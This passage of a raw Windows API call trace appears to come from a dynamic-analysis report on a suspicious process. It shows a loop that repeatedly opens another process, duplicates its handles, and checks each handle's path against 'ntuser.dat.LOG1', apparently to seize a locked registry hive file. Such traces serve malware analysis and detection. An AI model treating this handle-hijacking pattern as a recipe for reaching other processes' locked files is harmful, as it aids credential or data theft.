lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.005] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.006] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.007] CloseHandle (hObject=0x670) returned 1 [0152.007] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.007] CloseHandle (hObject=0x680) returned 1 [0152.007] CloseHandle (hObject=0x62c) returned 1 [0152.007] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.007] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.007] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.008] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.008] CloseHandle (hObject=0x670) returned 1 [0152.008] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.008] CloseHandle (hObject=0x680) returned 1 [0152.008] CloseHandle (hObject=0x62c) returned 1 [0152.008] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.009] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.009] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.010] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.010] CloseHandle (hObject=0x670) returned 1 [0152.010] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.010] CloseHandle (hObject=0x680) returned 1 [0152.010] CloseHandle (hObject=0x62c) returned 1 [0152.010] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.010] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.011] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.011] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.011] CloseHandle (hObject=0x670) returned 1 [0152.011] _wcsicmp (_Str1="\\Burn", _Str2="\\ntuser.dat.LOG1") returned -12 [0152.012] CloseHandle (hObject=0x680) returned 1 [0152.012] CloseHandle (hObject=0x62c) returned 1 [0152.012] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.012] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.016] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.017] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.017] CloseHandle (hObject=0x670) returned 1 [0152.017] _wcsicmp (_Str1="\\Burn", _Str2="\\ntuser.dat.LOG1") returned -12 [0152.017] CloseHandle (hObject=0x680) returned 1 [0152.017] CloseHandle (hObject=0x62c) returned 1 [0152.017] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.017] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.017] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.018] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.018] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.018] CloseHandle (hObject=0x670) returned 1 [0152.018] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.019] CloseHandle (hObject=0x680) returned 1 [0152.019] CloseHandle (hObject=0x62c) returned 1 [0152.019] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.019] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.019] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.020] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.020] CloseHandle (hObject=0x670) returned 1 [0152.020] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.020] CloseHandle (hObject=0x680) returned 1 [0152.020] CloseHandle (hObject=0x62c) returned 1 [0152.020] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.021] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.022] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.022] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.022] CloseHandle (hObject=0x670) returned 1 [0152.022] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\ntuser.dat.LOG1") returned -12 [0152.022] CloseHandle (hObject=0x680) returned 1 [0152.023] CloseHandle (hObject=0x62c) returned 1 [0152.023] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.023] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.023] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.024] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.024] CloseHandle (hObject=0x670) returned 1 [0152.024] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.024] CloseHandle (hObject=0x680) returned 1 [0152.024] CloseHandle (hObject=0x62c) returned 1 [0152.024] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.024] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.025] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.026] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.026] CloseHandle (hObject=0x670) returned 1 [0152.026] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.026] CloseHandle (hObject=0x680) returned 1 [0152.026] CloseHandle (hObject=0x62c) returned 1 [0152.026] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.026] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.027] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.028] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.028] CloseHandle (hObject=0x670) returned 1 [0152.028] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.028] CloseHandle (hObject=0x680) returned 1 [0152.028] CloseHandle (hObject=0x62c) returned 1 [0152.028] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.028] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.029] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.030] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.030] CloseHandle (hObject=0x670) returned 1 [0152.030] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.030] CloseHandle (hObject=0x680) returned 1 [0152.030] CloseHandle (hObject=0x62c) returned 1 [0152.030] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.030] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.031] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.031] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.032] CloseHandle (hObject=0x670) returned 1 [0152.032] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.032] CloseHandle (hObject=0x680) returned 1 [0152.032] CloseHandle (hObject=0x62c) returned 1 [0152.032] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.032] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.033] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.033] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.033] CloseHandle (hObject=0x670) returned 1 [0152.034] CloseHandle (hObject=0x680) returned 1 [0152.034] CloseHandle (hObject=0x62c) returned 1 [0152.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.034] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.034] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.035] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.035] CloseHandle (hObject=0x670) returned 1 [0152.035] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.035] CloseHandle (hObject=0x680) returned 1 [0152.035] CloseHandle (hObject=0x62c) returned 1 [0152.035] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.035] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.036] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.037] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.037] CloseHandle (hObject=0x670) returned 1 [0152.037] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\ntuser.dat.LOG1") returned 2 [0152.037] CloseHandle (hObject=0x680) returned 1 [0152.037] CloseHandle (hObject=0x62c) returned 1 [0152.037] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.037] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.038] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.038] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.038] CloseHandle (hObject=0x670) returned 1 [0152.039] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\ntuser.dat.LOG1") returned 2 [0152.039] CloseHandle (hObject=0x680) returned 1 [0152.039] CloseHandle (hObject=0x62c) returned 1 [0152.039] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.039] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.039] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.040] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.040] CloseHandle (hObject=0x670) returned 1 [0152.040] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.040] CloseHandle (hObject=0x680) returned 1 [0152.040] CloseHandle (hObject=0x62c) returned 1 [0152.040] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.040] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.041] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.042] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.042] CloseHandle (hObject=0x670) returned 1 [0152.042] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -15 [0152.042] CloseHandle (hObject=0x680) returned 1 [0152.042] CloseHandle (hObject=0x62c) returned 1 [0152.042] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.042] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.043] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.043] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.043] CloseHandle (hObject=0x670) returned 1 [0152.044] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.044] CloseHandle (hObject=0x680) returned 1 [0152.044] CloseHandle (hObject=0x62c) returned 1 [0152.044] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.044] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.044] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.045] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.045] CloseHandle (hObject=0x670) returned 1 [0152.045] CloseHandle (hObject=0x680) returned 1 [0152.045] CloseHandle (hObject=0x62c) returned 1 [0152.045] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.045] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.046] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.047] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.047] CloseHandle (hObject=0x670) returned 1 [0152.047] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0152.047] CloseHandle (hObject=0x680) returned 1 [0152.047] CloseHandle (hObject=0x62c) returned 1 [0152.047] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.047] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.048] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.048] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.049] CloseHandle (hObject=0x670) returned 1 [0152.049] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.049] CloseHandle (hObject=0x680) returned 1 [0152.049] CloseHandle (hObject=0x62c) returned 1 [0152.049] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.049] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.050] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.050] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.050] CloseHandle (hObject=0x670) returned 1 [0152.050] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.050] CloseHandle (hObject=0x680) returned 1 [0152.050] CloseHandle (hObject=0x62c) returned 1 [0152.050] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.050] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.050] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.051] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.051] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.052] CloseHandle (hObject=0x670) returned 1 [0152.052] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.052] CloseHandle (hObject=0x680) returned 1 [0152.052] CloseHandle (hObject=0x62c) returned 1 [0152.052] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.052] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.053] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.053] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.053] CloseHandle (hObject=0x670) returned 1 [0152.054] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.054] CloseHandle (hObject=0x680) returned 1 [0152.054] CloseHandle (hObject=0x62c) returned 1 [0152.054] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.054] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.054] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.055] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.055] CloseHandle (hObject=0x670) returned 1 [0152.055] 